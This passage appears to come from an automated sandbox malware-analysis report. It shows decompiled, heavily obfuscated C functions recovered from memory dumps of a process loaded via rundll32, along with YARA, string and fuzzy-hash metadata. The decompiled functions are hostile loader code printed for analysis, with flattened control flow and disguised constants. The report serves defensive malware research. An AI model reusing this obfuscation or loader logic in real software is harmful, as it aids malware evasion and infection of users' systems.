                                                                      				_v180 = 0x8794;
                                                                      				_v180 = _v180 << 2;
                                                                      				_v180 = _v180 ^ 0x00025325;
                                                                      				_v320 = 0x9a55;
                                                                      				_v320 = _v320 << 0xf;
                                                                      				_v320 = _v320 << 0xa;
                                                                      				_t481 = 0x55;
                                                                      				_v320 = _v320 * 0x4d;
                                                                      				_v320 = _v320 ^ 0x22000a83;
                                                                      				_v248 = 0xe379;
                                                                      				_v248 = _v248 >> 7;
                                                                      				_v248 = _v248 >> 0xc;
                                                                      				_v248 = _v248 ^ 0x00003db5;
                                                                      				_v284 = 0xccf8;
                                                                      				_v284 = _v284 + 0x1e46;
                                                                      				_v284 = _v284 * 0x38;
                                                                      				_v284 = _v284 * 0x58;
                                                                      				_v284 = _v284 ^ 0x11b007cd;
                                                                      				_v300 = 0x32ae;
                                                                      				_v300 = _v300 << 2;
                                                                      				_v300 = _v300 >> 0x10;
                                                                      				_v300 = _v300 << 0xe;
                                                                      				_v300 = _v300 ^ 0x00000792;
                                                                      				_v216 = 0x5329;
                                                                      				_v216 = _v216 + 0xb5c4;
                                                                      				_v216 = _v216 ^ 0x00016a2e;
                                                                      				_v256 = 0xf2a3;
                                                                      				_v256 = _v256 / _t481;
                                                                      				_v256 = _v256 >> 6;
                                                                      				_v256 = _v256 ^ 0x00001717;
                                                                      				_v304 = 0x96fc;
                                                                      				_v304 = _v304 | 0xda0a5c24;
                                                                      				_t482 = 0x2b;
                                                                      				_v304 = _v304 * 0x37;
                                                                      				_v304 = _v304 + 0xd389;
                                                                      				_v304 = _v304 ^ 0xd856d340;
                                                                      				_v240 = 0x24a9;
                                                                      				_v240 = _v240 >> 0xf;
                                                                      				_v240 = _v240 | 0xd0db0b52;
                                                                      				_v240 = _v240 ^ 0xd0db68a6;
                                                                      				_v312 = 0x7296;
                                                                      				_v312 = _v312 << 5;
                                                                      				_v312 = _v312 >> 0x10;
                                                                      				_v312 = _v312 >> 0x10;
                                                                      				_v312 = _v312 ^ 0x000057a1;
                                                                      				_v204 = 0xffd2;
                                                                      				_v204 = _v204 + 0x4d88;
                                                                      				_v204 = _v204 ^ 0x000119e7;
                                                                      				_v316 = 0x8b8b;
                                                                      				_v316 = _v316 / _t482;
                                                                      				_v316 = _v316 ^ 0x980bb32c;
                                                                      				_v316 = _v316 ^ 0xc4a4ea1d;
                                                                      				_v316 = _v316 ^ 0x5caf30c9;
                                                                      				_v268 = 0x337b;
                                                                      				_v268 = _v268 + 0x5b7d;
                                                                      				_v268 = _v268 + 0x12aa;
                                                                      				_v268 = _v268 ^ 0x0000b326;
                                                                      				_v296 = 0xc10a;
                                                                      				_v296 = _v296 + 0xffff865a;
                                                                      				_v296 = _v296 + 0x4a11;
                                                                      				_v296 = _v296 + 0xffff623b;
                                                                      				_v296 = _v296 ^ 0xffffbd38;
                                                                      				_v208 = 0x68d9;
                                                                      				_v208 = _v208 << 0xa;
                                                                      				_v208 = _v208 ^ 0x01a30f5d;
                                                                      				_v192 = 0x7a63;
                                                                      				_v192 = _v192 << 0xc;
                                                                      				_v192 = _v192 ^ 0x07a656ca;
                                                                      				_v200 = 0x6d3e;
                                                                      				_v200 = _v200 << 7;
                                                                      				_v200 = _v200 ^ 0x003687c2;
                                                                      				_v288 = 0x5a10;
                                                                      				_v288 = _v288 << 9;
                                                                      				_t483 = 0x69;
                                                                      				_v288 = _v288 / _t483;
                                                                      				_v288 = _v288 + 0x4454;
                                                                      				_v288 = _v288 ^ 0x0001df75;
                                                                      				_v224 = 0x28de;
                                                                      				_v224 = _v224 >> 0xa;
                                                                      				_v224 = _v224 + 0xffff52ce;
                                                                      				_v224 = _v224 ^ 0xffff05f8;
                                                                      				_v272 = 0xab64;
                                                                      				_v272 = _v272 + 0xfffffe6e;
                                                                      				_v272 = _v272 >> 4;
                                                                      				_v272 = _v272 ^ 0xa501867a;
                                                                      				_v272 = _v272 ^ 0xa501bad7;
                                                                      				_v184 = 0xdf13;
                                                                      				_v184 = _v184 + 0x420b;
                                                                      				_v184 = _v184 ^ 0x00013cc7;
                                                                      				_v280 = 0x5728;
                                                                      				_v280 = _v280 + 0xffffcc3b;
                                                                      				_v280 = _v280 + 0x76b7;
                                                                      				_t484 = 0x61;
                                                                      				_t493 = _a4;
                                                                      				_t485 = _v148;
                                                                      				_t433 = _v148;
                                                                      				_v280 = _v280 / _t484;
                                                                      				_v280 = _v280 ^ 0x00007737;
                                                                      				while(_t486 != 0x9208284) {
                                                                      					if(_t486 == 0xa621ed2) {
                                                                      						E01FF6374(_v204, _t485,  *((intOrPtr*)(_t436 + 4)),  *_t436, _v316);
                                                                      						_t436 = _v152;
                                                                      						_t494 =  &(_t494[3]);
                                                                      						_t486 = 0x29b23c8e;
                                                                      						_t485 = _t485 +  *((intOrPtr*)(_t436 + 4));
                                                                      						continue;
                                                                      					}
                                                                      					if(_t486 == 0x29b23c8e) {
                                                                      						_push(0x1ff151c);
                                                                      						_push(_v208);
                                                                      						E01FFE9D6(_v192, __eflags, E0200CF31(_v268, _v296, __eflags), _v200, _v148, _v288, _v224, _t485);
                                                                      						E02000D6D(_v272, _v184, _v280, _t420);
                                                                      						return 1;
                                                                      					}
                                                                      					if(_t486 == 0x2fd49363) {
                                                                      						_v156 = E01FFA156();
                                                                      						_t486 = 0x34a28646;
                                                                      						L9:
                                                                      						_t436 = _v152;
                                                                      						continue;
                                                                      					}
                                                                      					if(_t486 == 0x34a28646) {
                                                                      						_t486 = 0x37f3463b;
                                                                      						_a4 =  *((intOrPtr*)(_t436 + 4)) + 0x1000;
                                                                      						continue;
                                                                      					}
                                                                      					if(_t486 != 0x37f3463b) {
                                                                      						L14:
                                                                      						__eflags = _t486 - 0x2874212b;
                                                                      						if(__eflags != 0) {
                                                                      							continue;
                                                                      						}
                                                                      						L15:
                                                                      						__eflags = 0;
                                                                      						return 0;
                                                                      					}
                                                                      					_push(_t436);
                                                                      					_t485 = E01FF54FB(_a4);
                                                                      					 *_t493 = _t485;
                                                                      					if(_t485 == 0) {
                                                                      						goto L15;
                                                                      					}
                                                                      					_t486 = 0x9208284;
                                                                      					_t433 = _a4 + _t485;
                                                                      					goto L9;
                                                                      				}
                                                                      				_t406 = E01FFF569(_v220,  &_v156, _v232, _v164);
                                                                      				_t495 =  &(_t494[1]);
                                                                      				_t339 = (_t406 & 0x0000000f) + 4; // 0x4
                                                                      				E01FFEF7F(_t339, _v228, _v292,  &_v156,  &_v128, _v260);
                                                                      				 *((char*)(_t495 + (_t406 & 0x0000000f) + 0xf0)) = 0;
                                                                      				_t410 = E01FFF569(_v236,  &_v156, _v188, _v176);
                                                                      				_t496 =  &(_t495[7]);
                                                                      				_t352 = (_t410 & 0x0000000f) + 4; // 0x4
                                                                      				E01FFEF7F(_t352, _v168, _v264,  &_v156,  &_v64, _v244);
                                                                      				_push(0x1ff15ac);
                                                                      				_push(_v180);
                                                                      				 *((char*)(_t496 + (_t410 & 0x0000000f) + 0x134)) = 0;
                                                                      				_t417 = E01FFD28D( &_v128, __eflags, _t433 - _t485, _v320, _v148, E0200CF31(_v160, _v276, __eflags), _v248, _v284, _v300, _v216, _v256, _t485);
                                                                      				_t494 =  &(_t496[0x12]);
                                                                      				_t485 = _t485 + _t417;
                                                                      				__eflags = _t485;
                                                                      				E02000D6D(_v304, _v240, _v312, _t414);
                                                                      				_t436 = _v152;
                                                                      				_t486 = 0xa621ed2;
                                                                      				goto L14;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (W$)S$+!t($7w$>m$TD$Xy@$Zd$cz$y$}[$0
                                                                      • API String ID: 0-1558577346
                                                                      • Opcode ID: e2de858ffcc13a891915fefacf3f3a2edd60ff76bd7b011f0df01e05dc889161
                                                                      • Instruction ID: ee1ae42d643f2b83f6c3a4e988f0fc4df27ba7f188820019be8e283b3bc32485
                                                                      • Opcode Fuzzy Hash: e2de858ffcc13a891915fefacf3f3a2edd60ff76bd7b011f0df01e05dc889161
                                                                      • Instruction Fuzzy Hash: C41232725083819FE3A4CF25C489A8FFBE1BBC4758F00891DE5D9962A0D7B99909CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (W$)S$+!t($7w$>m$TD$Xy@$Zd$cz$y$}[$0
                                                                      • API String ID: 0-1558577346
                                                                      • Opcode ID: c996e793aa92d32c9d4ee85a689b4a155b856a04444eddf3dc1470e7b71cd492
                                                                      • Instruction ID: bfe1e8c0f19e88671d1c5bd1d884f441564dec12e7086b1c85ff7031de173b3f
                                                                      • Opcode Fuzzy Hash: c996e793aa92d32c9d4ee85a689b4a155b856a04444eddf3dc1470e7b71cd492
                                                                      • Instruction Fuzzy Hash: 0E1210B2508381DFE3A4CF25C589A8BFBE2BBC5718F10891DE5D996260D7B58909CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E0200D02D() {
                                                                      				char _v520;
                                                                      				char _v1040;
                                                                      				char _v1560;
                                                                      				intOrPtr _v1564;
                                                                      				intOrPtr _v1568;
                                                                      				signed int _v1572;
                                                                      				signed int _v1576;
                                                                      				signed int _v1580;
                                                                      				signed int _v1584;
                                                                      				signed int _v1588;
                                                                      				signed int _v1592;
                                                                      				signed int _v1596;
                                                                      				signed int _v1600;
                                                                      				signed int _v1604;
                                                                      				signed int _v1608;
                                                                      				signed int _v1612;
                                                                      				signed int _v1616;
                                                                      				signed int _v1620;
                                                                      				signed int _v1624;
                                                                      				signed int _v1628;
                                                                      				signed int _v1632;
                                                                      				signed int _v1636;
                                                                      				signed int _v1640;
                                                                      				signed int _v1644;
                                                                      				signed int _v1648;
                                                                      				signed int _v1652;
                                                                      				signed int _v1656;
                                                                      				signed int _v1660;
                                                                      				signed int _v1664;
                                                                      				signed int _v1668;
                                                                      				void* _t261;
                                                                      				void* _t264;
                                                                      				void* _t276;
                                                                      				intOrPtr _t299;
                                                                      				signed int _t300;
                                                                      				signed int _t301;
                                                                      				signed int _t302;
                                                                      				signed int _t303;
                                                                      				signed int _t304;
                                                                      				signed int _t305;
                                                                      				signed int* _t308;
                                                                      
                                                                      				_t308 =  &_v1668;
                                                                      				_v1568 = 0x1b7baa;
                                                                      				_t276 = 0x2bf07c54;
                                                                      				_v1564 = 0;
                                                                      				_v1620 = 0x5ac8;
                                                                      				_v1620 = _v1620 | 0x6f7e2d8c;
                                                                      				_v1620 = _v1620 + 0x1161;
                                                                      				_v1620 = _v1620 ^ 0x6f7e9104;
                                                                      				_v1632 = 0x343;
                                                                      				_v1632 = _v1632 * 0x4f;
                                                                      				_t299 = 0;
                                                                      				_v1632 = _v1632 << 0xd;
                                                                      				_v1632 = _v1632 + 0xffffca78;
                                                                      				_v1632 = _v1632 ^ 0x203536e7;
                                                                      				_v1640 = 0xae45;
                                                                      				_v1640 = _v1640 >> 9;
                                                                      				_t300 = 0x1d;
                                                                      				_v1640 = _v1640 * 0x65;
                                                                      				_v1640 = _v1640 + 0xffffcd5a;
                                                                      				_v1640 = _v1640 ^ 0xffffb49c;
                                                                      				_v1648 = 0xf6df;
                                                                      				_v1648 = _v1648 ^ 0x32487b57;
                                                                      				_v1648 = _v1648 << 0xf;
                                                                      				_v1648 = _v1648 + 0xffff3bb0;
                                                                      				_v1648 = _v1648 ^ 0x46c37aca;
                                                                      				_v1656 = 0xe0fe;
                                                                      				_v1656 = _v1656 | 0xbb3f58fa;
                                                                      				_v1656 = _v1656 >> 1;
                                                                      				_v1656 = _v1656 ^ 0x4bc4dda6;
                                                                      				_v1656 = _v1656 ^ 0x165b1a8c;
                                                                      				_v1664 = 0xf6b0;
                                                                      				_v1664 = _v1664 * 0x33;
                                                                      				_v1664 = _v1664 + 0xf145;
                                                                      				_v1664 = _v1664 | 0xcc479c42;
                                                                      				_v1664 = _v1664 ^ 0xcc77be62;
                                                                      				_v1624 = 0x11e5;
                                                                      				_v1624 = _v1624 >> 0xd;
                                                                      				_v1624 = _v1624 ^ 0x0c673627;
                                                                      				_v1624 = _v1624 ^ 0x0c670e7e;
                                                                      				_v1660 = 0xb30e;
                                                                      				_v1660 = _v1660 / _t300;
                                                                      				_v1660 = _v1660 ^ 0x2f8cd0cc;
                                                                      				_v1660 = _v1660 << 0xa;
                                                                      				_v1660 = _v1660 ^ 0x335bb46d;
                                                                      				_v1592 = 0x30a6;
                                                                      				_v1592 = _v1592 + 0x2da3;
                                                                      				_v1592 = _v1592 ^ 0x000056bb;
                                                                      				_v1636 = 0x9dba;
                                                                      				_v1636 = _v1636 << 5;
                                                                      				_v1636 = _v1636 >> 0xd;
                                                                      				_v1636 = _v1636 * 0x6e;
                                                                      				_v1636 = _v1636 ^ 0x000074bb;
                                                                      				_v1576 = 0xf88b;
                                                                      				_v1576 = _v1576 >> 8;
                                                                      				_v1576 = _v1576 ^ 0x00004a5e;
                                                                      				_v1616 = 0xe870;
                                                                      				_v1616 = _v1616 + 0xffffed0c;
                                                                      				_v1616 = _v1616 << 0xa;
                                                                      				_v1616 = _v1616 ^ 0x03558e80;
                                                                      				_v1572 = 0x8968;
                                                                      				_v1572 = _v1572 + 0xffff9e89;
                                                                      				_v1572 = _v1572 ^ 0x000033ab;
                                                                      				_v1584 = 0x6f5c;
                                                                      				_v1584 = _v1584 | 0x7a285989;
                                                                      				_v1584 = _v1584 ^ 0x7a28059f;
                                                                      				_v1652 = 0x53fb;
                                                                      				_t301 = 0x4a;
                                                                      				_v1652 = _v1652 / _t301;
                                                                      				_t302 = 0x51;
                                                                      				_v1652 = _v1652 * 0x2e;
                                                                      				_v1652 = _v1652 / _t302;
                                                                      				_v1652 = _v1652 ^ 0x00006fe4;
                                                                      				_v1644 = 0x731a;
                                                                      				_v1644 = _v1644 | 0xb42c1025;
                                                                      				_t303 = 0x26;
                                                                      				_v1644 = _v1644 / _t303;
                                                                      				_v1644 = _v1644 | 0x5ebde771;
                                                                      				_v1644 = _v1644 ^ 0x5ebd9fe9;
                                                                      				_v1608 = 0x9c04;
                                                                      				_v1608 = _v1608 + 0xffffbe0d;
                                                                      				_t304 = 0xf;
                                                                      				_v1608 = _v1608 * 6;
                                                                      				_v1608 = _v1608 ^ 0x00025ea7;
                                                                      				_v1668 = 0x85df;
                                                                      				_v1668 = _v1668 ^ 0xd0bd5991;
                                                                      				_v1668 = _v1668 ^ 0x5dcfb772;
                                                                      				_v1668 = _v1668 | 0x361cad49;
                                                                      				_v1668 = _v1668 ^ 0xbf7e8aa2;
                                                                      				_v1628 = 0x5370;
                                                                      				_v1628 = _v1628 + 0x8359;
                                                                      				_v1628 = _v1628 | 0x35599af6;
                                                                      				_v1628 = _v1628 ^ 0x3559ade8;
                                                                      				_v1600 = 0x3375;
                                                                      				_v1600 = _v1600 + 0xffffeb08;
                                                                      				_v1600 = _v1600 >> 0xd;
                                                                      				_v1600 = _v1600 ^ 0x00002cf7;
                                                                      				_v1596 = 0x275b;
                                                                      				_v1596 = _v1596 + 0x8562;
                                                                      				_v1596 = _v1596 / _t304;
                                                                      				_v1596 = _v1596 ^ 0x000042b5;
                                                                      				_v1588 = 0xe1bb;
                                                                      				_t305 = 0x3c;
                                                                      				_v1588 = _v1588 / _t305;
                                                                      				_v1588 = _v1588 ^ 0x00004bb0;
                                                                      				_v1604 = 0x7428;
                                                                      				_v1604 = _v1604 | 0x56b3a402;
                                                                      				_v1604 = _v1604 + 0xffffe147;
                                                                      				_v1604 = _v1604 ^ 0x56b399df;
                                                                      				_v1612 = 0xaa76;
                                                                      				_v1612 = _v1612 + 0x75ae;
                                                                      				_v1612 = _v1612 | 0x3c256991;
                                                                      				_v1612 = _v1612 ^ 0x3c250096;
                                                                      				_v1580 = 0xd062;
                                                                      				_v1580 = _v1580 ^ 0x00008aa5;
                                                                      				do {
                                                                      					while(_t276 != 0x1ed979be) {
                                                                      						if(_t276 == 0x2bf07c54) {
                                                                      							_push(_t276);
                                                                      							E01FF471A(_v1620,  &_v1560, _v1632, _v1640, _v1648, _v1656, _v1664);
                                                                      							_t308 =  &(_t308[8]);
                                                                      							_t276 = 0x2f47d6b1;
                                                                      							continue;
                                                                      						} else {
                                                                      							_t312 = _t276 - 0x2f47d6b1;
                                                                      							if(_t276 == 0x2f47d6b1) {
                                                                      								_push(0x1ff1308);
                                                                      								_push(_v1636);
                                                                      								_push(_v1592);
                                                                      								_t264 = E01FF5DFC(_v1624, _v1660, _t312);
                                                                      								E0200D4E1( &_v1040, _t312);
                                                                      								E01FF98C5(0x104, _t312, _v1576, _v1616, _v1572, _v1584, _v1652,  *0x2011088 + 0x254, _v1644, _v1608,  &_v1040,  *0x2011088 + 0x38, _t264,  &_v1560);
                                                                      								E02000D6D(_v1668, _v1628, _v1600, _t264);
                                                                      								_t308 =  &(_t308[0x11]);
                                                                      								_t276 = 0x1ed979be;
                                                                      								continue;
                                                                      							}
                                                                      						}
                                                                      						goto L7;
                                                                      					}
                                                                      					_push(0);
                                                                      					_push( &_v520);
                                                                      					_push(_v1580);
                                                                      					_push(_v1612);
                                                                      					_push(_v1604);
                                                                      					_push(_v1588);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_t261 = E01FF6417(_v1596, __eflags);
                                                                      					_t308 =  &(_t308[8]);
                                                                      					__eflags = _t261;
                                                                      					_t299 =  !=  ? 1 : _t299;
                                                                      					_t276 = 0x35e6e12b;
                                                                      					L7:
                                                                      					__eflags = _t276 - 0x35e6e12b;
                                                                      				} while (__eflags != 0);
                                                                      				return _t299;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (t$+5$+5$W{H2$['$\o$^J$pS$p$u3$65 $o
                                                                      • API String ID: 0-2856137141
                                                                      • Opcode ID: b0f86fa86cfaae11668ea771071c0c9c74933f09823ed522ebc9c0309be1f3a7
                                                                      • Instruction ID: c64d3df6154461ce966fefc2925dfd6e969094feeb51e995bc108870325dcac7
                                                                      • Opcode Fuzzy Hash: b0f86fa86cfaae11668ea771071c0c9c74933f09823ed522ebc9c0309be1f3a7
                                                                      • Instruction Fuzzy Hash: D0C121715083809FE368CF65C98995BFBE1FBC4758F104A1DF286862A0D7B9CA49CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (t$+5$+5$W{H2$['$\o$^J$pS$p$u3$65 $o
                                                                      • API String ID: 0-2856137141
                                                                      • Opcode ID: 902fb5a5338738160e621409dfb9f9346e4afdcae1733b59e629423e593282c2
                                                                      • Instruction ID: fe6c56e5695355ecff4ac2acc9f8649dde225d7ca0afcf149b2453adde370018
                                                                      • Opcode Fuzzy Hash: 902fb5a5338738160e621409dfb9f9346e4afdcae1733b59e629423e593282c2
                                                                      • Instruction Fuzzy Hash: 99C111B15083819FD368CF25C98A95BFBF1BBC4758F104A1DF196862A0D7B98A49CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E01FF3336(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                      				char _v4;
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				unsigned int _v64;
                                                                      				void* _t123;
                                                                      				intOrPtr _t134;
                                                                      				void* _t135;
                                                                      				void* _t139;
                                                                      				void* _t141;
                                                                      				signed int _t153;
                                                                      				signed int _t154;
                                                                      				void* _t156;
                                                                      				signed int* _t160;
                                                                      
                                                                      				_push(_a20);
                                                                      				_t139 = __ecx;
                                                                      				_push(_a16);
                                                                      				_push(1);
                                                                      				_push(_a8);
                                                                      				_push(1);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t123);
                                                                      				_v60 = 0x58ef;
                                                                      				_t160 =  &(( &_v64)[7]);
                                                                      				_v60 = _v60 + 0xffff0633;
                                                                      				_v60 = _v60 >> 9;
                                                                      				_t156 = 0;
                                                                      				_t141 = 0x2a642033;
                                                                      				_t153 = 0x63;
                                                                      				_v60 = _v60 * 0x2a;
                                                                      				_v60 = _v60 ^ 0x14ffaedf;
                                                                      				_v20 = 0x6a04;
                                                                      				_v20 = _v20 + 0x32d0;
                                                                      				_v20 = _v20 ^ 0x0000ddf0;
                                                                      				_v48 = 0x380;
                                                                      				_v48 = _v48 ^ 0x907d2ab9;
                                                                      				_v48 = _v48 + 0x250e;
                                                                      				_v48 = _v48 ^ 0x907d1045;
                                                                      				_v52 = 0x47eb;
                                                                      				_v52 = _v52 >> 0x10;
                                                                      				_v52 = _v52 + 0xffff29cf;
                                                                      				_v52 = _v52 ^ 0xffff09ac;
                                                                      				_v24 = 0x6d24;
                                                                      				_v24 = _v24 / _t153;
                                                                      				_v24 = _v24 ^ 0x0000449d;
                                                                      				_v28 = 0xbb34;
                                                                      				_v28 = _v28 + 0xffffe3e2;
                                                                      				_v28 = _v28 ^ 0x00008aa5;
                                                                      				_v32 = 0x42c0;
                                                                      				_v32 = _v32 << 8;
                                                                      				_v32 = _v32 ^ 0x004292e1;
                                                                      				_v36 = 0x1d03;
                                                                      				_v36 = _v36 | 0xc4a3f1ad;
                                                                      				_v36 = _v36 ^ 0xc4a39a93;
                                                                      				_v40 = 0x16bd;
                                                                      				_v40 = _v40 << 8;
                                                                      				_v40 = _v40 ^ 0x0016fb39;
                                                                      				_v44 = 0x384e;
                                                                      				_t154 = 0x3b;
                                                                      				_v44 = _v44 / _t154;
                                                                      				_v44 = _v44 ^ 0x00003cb9;
                                                                      				_v64 = 0x6f3c;
                                                                      				_v64 = _v64 + 0x49f0;
                                                                      				_v64 = _v64 * 0x12;
                                                                      				_v64 = _v64 >> 0xb;
                                                                      				_v64 = _v64 ^ 0x00002a42;
                                                                      				_v8 = 0x21c3;
                                                                      				_v8 = _v8 << 0xb;
                                                                      				_v8 = _v8 ^ 0x010e5853;
                                                                      				_v12 = 0xc49d;
                                                                      				_v12 = _v12 << 0xb;
                                                                      				_v12 = _v12 ^ 0x0624cbc5;
                                                                      				_v16 = 0x33ea;
                                                                      				_v16 = _v16 + 0xffff095d;
                                                                      				_v16 = _v16 ^ 0xffff1135;
                                                                      				_v56 = 0x9287;
                                                                      				_v56 = _v56 * 0x3d;
                                                                      				_v56 = _v56 | 0xa9bdb70a;
                                                                      				_v56 = _v56 ^ 0x6edfa2bf;
                                                                      				_v56 = _v56 ^ 0xc7607732;
                                                                      				_t155 = _v4;
                                                                      				do {
                                                                      					while(_t141 != 0x213a8f08) {
                                                                      						if(_t141 == 0x27f2e66a) {
                                                                      							_t135 = E02002878(_t155,  &_v4, _v48, _v52, _v24);
                                                                      							_t160 =  &(_t160[3]);
                                                                      							if(_t135 != 0) {
                                                                      								_t141 = 0x2db65059;
                                                                      								continue;
                                                                      							}
                                                                      						} else {
                                                                      							if(_t141 == 0x29395626) {
                                                                      								E01FFF1ED(_v8, _v12, _v16, _v56, _v4);
                                                                      							} else {
                                                                      								if(_t141 == 0x2a642033) {
                                                                      									_t141 = 0x213a8f08;
                                                                      									continue;
                                                                      								} else {
                                                                      									if(_t141 != 0x2db65059) {
                                                                      										goto L13;
                                                                      									} else {
                                                                      										_t105 =  &_v64; // 0x9
                                                                      										E01FF3850(_v4, 1, _v28, _t141, 1, _v32, _v36, _v40, _v44, _t139,  *_t105, _a8);
                                                                      										_t160 =  &(_t160[0xa]);
                                                                      										_t141 = 0x29395626;
                                                                      										_t156 =  !=  ? 1 : _t156;
                                                                      										continue;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L16:
                                                                      						return _t156;
                                                                      					}
                                                                      					_t134 = E01FFF2AB();
                                                                      					_t155 = _t134;
                                                                      					if(_t134 == 0xffffffff) {
                                                                      						_t141 = 0x3912b486;
                                                                      						goto L13;
                                                                      					} else {
                                                                      						_t141 = 0x27f2e66a;
                                                                      						continue;
                                                                      					}
                                                                      					goto L16;
                                                                      					L13:
                                                                      				} while (_t141 != 0x3912b486);
                                                                      				goto L16;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B*$B*$$m$&V9)$&V9)$3 d*$3 d*$B*$N8$3$G$X
                                                                      • API String ID: 0-1096093052
                                                                      • Opcode ID: 521acd00a0da17cdbf2c41cbea6d9d8a89f3cfc0f17e08e26cf1249a71e27ffd
                                                                      • Instruction ID: ee542c56d035fbbfd5b71d3b09a142fd17f1aff4b0a0803b0dd5eec5572add3b
                                                                      • Opcode Fuzzy Hash: 521acd00a0da17cdbf2c41cbea6d9d8a89f3cfc0f17e08e26cf1249a71e27ffd
                                                                      • Instruction Fuzzy Hash: 676154B1508342DBD358CF25C88981BBEF1BFD4748F504A0DF692962A0D7B6CA49CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B*$B*$$m$&V9)$&V9)$3 d*$3 d*$B*$N8$3$G$X
                                                                      • API String ID: 0-1096093052
                                                                      • Opcode ID: 79a5d864f846127270572b84529ccbb0276f247360850f9f8f4a9f3641cbf1bc
                                                                      • Instruction ID: 0f9f6d76282d4fe0afae27a3d127e7995789f6ea30aceee7489c53d8a5719e47
                                                                      • Opcode Fuzzy Hash: 79a5d864f846127270572b84529ccbb0276f247360850f9f8f4a9f3641cbf1bc
                                                                      • Instruction Fuzzy Hash: 486164B1518341DBD358CF24C98981BBBF6FBD4748F104A0DF592922A0D3B6CA69CB87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 81%
                                                                      			E01FFD6F0(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24) {
                                                                      				char _v524;
                                                                      				char _v1044;
                                                                      				short _v1588;
                                                                      				short _v1590;
                                                                      				char _v1592;
                                                                      				signed int _v1636;
                                                                      				signed int _v1640;
                                                                      				intOrPtr _v1644;
                                                                      				intOrPtr _v1648;
                                                                      				intOrPtr _v1652;
                                                                      				signed int _v1656;
                                                                      				signed int _v1660;
                                                                      				signed int _v1664;
                                                                      				signed int _v1668;
                                                                      				signed int _v1672;
                                                                      				signed int _v1676;
                                                                      				signed int _v1680;
                                                                      				signed int _v1684;
                                                                      				signed int _v1688;
                                                                      				signed int _v1692;
                                                                      				signed int _v1696;
                                                                      				signed int _v1700;
                                                                      				signed int _v1704;
                                                                      				signed int _v1708;
                                                                      				signed int _v1712;
                                                                      				signed int _v1716;
                                                                      				signed int _v1720;
                                                                      				signed int _v1724;
                                                                      				signed int _v1728;
                                                                      				signed int _v1732;
                                                                      				signed int _v1736;
                                                                      				signed int _v1740;
                                                                      				signed int _v1744;
                                                                      				signed int _v1748;
                                                                      				signed int _v1752;
                                                                      				signed int _v1756;
                                                                      				signed int _v1760;
                                                                      				signed int _v1764;
                                                                      				signed int _v1768;
                                                                      				signed int _v1772;
                                                                      				signed int _v1776;
                                                                      				signed int _v1780;
                                                                      				signed int _v1784;
                                                                      				signed int _v1788;
                                                                      				signed int _v1792;
